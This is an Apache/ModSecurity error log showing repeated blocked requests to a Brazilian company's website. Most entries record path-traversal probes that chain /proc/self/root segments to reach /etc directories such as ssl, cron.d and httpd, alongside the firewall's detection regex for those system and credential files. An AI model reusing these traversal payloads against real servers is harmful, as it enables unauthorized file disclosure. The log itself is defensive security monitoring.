[Thu Mar 19 13:54:40.842241 2026] [:error] [pid 26799:tid 140411557287680] [client 74.7.243.128:35290] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwqUNa6ubjKNq_cu4ZurQAAA1Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:54:49.772473 2026] [:error] [pid 26799:tid 140411557287680] [client 74.7.243.128:45106] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwqWNa6ubjKNq_cu4ZuswAAA1Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:54:51.300200 2026] [:error] [pid 14269:tid 140411624429312] [client 74.7.241.31:33708] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwqWwbLMZ6AikZjR9V1NwAAAA4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 13:54:56.991016 2026] [:error] [pid 27403:tid 140411632822016] [client 74.7.243.128:36062] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwqYBkFeYa1D6dYQnAJSAAAAc0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:55:08.131524 2026] [proxy_fcgi:error] [pid 17653:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:49448] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:55:09.338404 2026] [:error] [pid 7235:tid 140411725141760] [client 74.7.243.128:44488] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwqbfqxLDW4GITHUkSAJQAAAQI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:55:14.354205 2026] [:error] [pid 27403:tid 140411641214720] [client 74.7.241.31:52774] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwqbxkFeYa1D6dYQnAJUQAAAcw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:55:20.763515 2026] [:error] [pid 17887:tid 140411641214720] [client 74.7.243.128:48234] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwqeAkwaGbbGflqUZDgvAAAAMw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:55:34.407571 2026] [:error] [pid 27293:tid 140411565680384] [client 74.7.243.128:58312] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwqhv-YZRR_7pZ7nDKjOAAAA9U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:55:40.137773 2026] [proxy_fcgi:error] [pid 17887:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:50634] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:55:45.942727 2026] [:error] [pid 17653:tid 140411632822016] [client 74.7.241.31:58406] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwqkcdf6f5d65gmYZSRiQAAAs0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 13:55:52.760424 2026] [:error] [pid 15826:tid 140411708356352] [client 74.7.243.128:59684] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwqmOoXxyEfFpUF8f8kmgAAAUQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:55:56.170551 2026] [:error] [pid 17653:tid 140411649607424] [client 74.7.241.31:58406] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwqm8df6f5d65gmYZSRkAAAAss"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:56:04.704982 2026] [:error] [pid 15826:tid 140411574073088] [client 74.7.243.128:47154] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwqpOoXxyEfFpUF8f8kogAAAVQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:56:06.161782 2026] [proxy_fcgi:error] [pid 27293:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:51664] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:56:27.828925 2026] [:error] [pid 19093:tid 140411725141760] [client 74.7.243.128:48392] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwqu1_V7PWP6ixUYl7U5AAAAoI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:56:32.139585 2026] [proxy_fcgi:error] [pid 31803:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:52736] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:56:33.228043 2026] [:error] [pid 30077:tid 140411733534464] [client 74.7.241.31:58244] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwqwfu8EFLIOrSqIpvAWQAAAkE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 13:56:42.494859 2026] [:error] [pid 27403:tid 140411590858496] [client 74.7.243.128:55772] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwqyhkFeYa1D6dYQnAJfwAAAdI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:56:55.121786 2026] [proxy_fcgi:error] [pid 31803:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:53586] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:56:56.575095 2026] [:error] [pid 31803:tid 140411733534464] [client 74.7.243.128:35136] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwq2OyqAr6etmhZHNp3uQAAAEE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:56:59.124399 2026] [:error] [pid 7893:tid 140411658000128] [client 74.7.241.31:55358] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwq2xCii7xarUs8iHYAPAAAAgo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 13:57:07.229754 2026] [:error] [pid 27403:tid 140411624429312] [client 74.7.243.128:39284] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwq4xkFeYa1D6dYQnAJiwAAAc4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:57:15.376473 2026] [:error] [pid 7893:tid 140411607643904] [client 74.7.243.128:41126] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwq6xCii7xarUs8iHYASgAAAhA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:57:18.129791 2026] [proxy_fcgi:error] [pid 27403:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:54528] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:57:18.380130 2026] [:error] [pid 8557:tid 140411733534464] [client 74.7.228.61:36512] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abwq7Wm-FynrlR64ECVP9QAAA4E"]
[Thu Mar 19 13:57:24.285136 2026] [:error] [pid 26799:tid 140411741927168] [client 74.7.243.128:51544] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwq9Na6ubjKNq_cu4ZvCAAAA0A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
